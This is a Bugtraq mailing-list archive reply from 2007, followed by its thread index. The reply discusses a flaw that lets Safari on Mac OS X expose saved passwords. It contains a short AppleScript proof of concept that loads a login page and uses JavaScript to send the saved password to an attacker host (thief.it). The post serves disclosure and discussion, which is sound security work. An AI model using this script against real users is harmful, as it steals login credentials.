Bugtraq mailing list archives
Re: RE: Apple Safari on MacOSX may reveal user's saved passwords
From: poplix () papuasia org
Date: 14 May 2007 22:35:00 -0000
Mark, you read it correctly and you're right, anyway a malicious user at your console should not be able to read your passwords. Also note that to steal saved passwords it's sufficent to entice a victim to execute a malicious script like that: --BOF tell application "Safari" open location "https://www.target.com" end tell do shell script "/bin/sleep 10" tell application "Safari" do JavaScript "document.location.href='http://thief.it/steal_target?p='+document.loginform.password.value" in document 1 end tell --EOF I agree with you in saying that the execution of malicious scripts can lead in much more dangeruos attacks, anyway i consider this a vulnerability and i dont know why Apple belives this is the correct behaviour. . . many thanks for your comment -p
Current thread:
- Apple Safari on MacOSX may reveal user's saved passwords poplix (May 14)
- RE: Apple Safari on MacOSX may reveal user's saved passwords Lucas, Mark J. (May 14)
- Re: Apple Safari on MacOSX may reveal user's saved passwords stephen joseph butler (May 16)
- <Possible follow-ups>
- RE: Apple Safari on MacOSX may reveal user's saved passwords mailbox () martinelli com (May 14)
- RE: Apple Safari on MacOSX may reveal user's saved passwords samelinux (May 15)
- Re: RE: Apple Safari on MacOSX may reveal user's saved passwords poplix (May 15)
- Re: Apple Safari on MacOSX may reveal user's saved passwords David Cantrell (May 16)
- Re: Apple Safari on MacOSX may reveal user's saved passwords graham . coles (May 16)
- Re: Apple Safari on MacOSX may reveal user's saved passwords Ian Ward Comfort (May 16)
- Re: Apple Safari on MacOSX may reveal user's saved passwords David Cantrell (May 17)
- Re: Apple Safari on MacOSX may reveal user's saved passwords graham . coles (May 17)
- Re: Apple Safari on MacOSX may reveal user's saved passwords poplix (May 18)
- Re: Apple Safari on MacOSX may reveal user's saved passwords Kevin Finisterre (lists) (May 18)
- Re: Apple Safari on MacOSX may reveal user's saved passwords poplix (May 19)
- Re: Apple Safari on MacOSX may reveal user's saved passwords David Cantrell (May 16)
- RE: Apple Safari on MacOSX may reveal user's saved passwords Lucas, Mark J. (May 14)
- Re: Apple Safari on MacOSX may reveal user's saved passwords Mark Senior (May 17)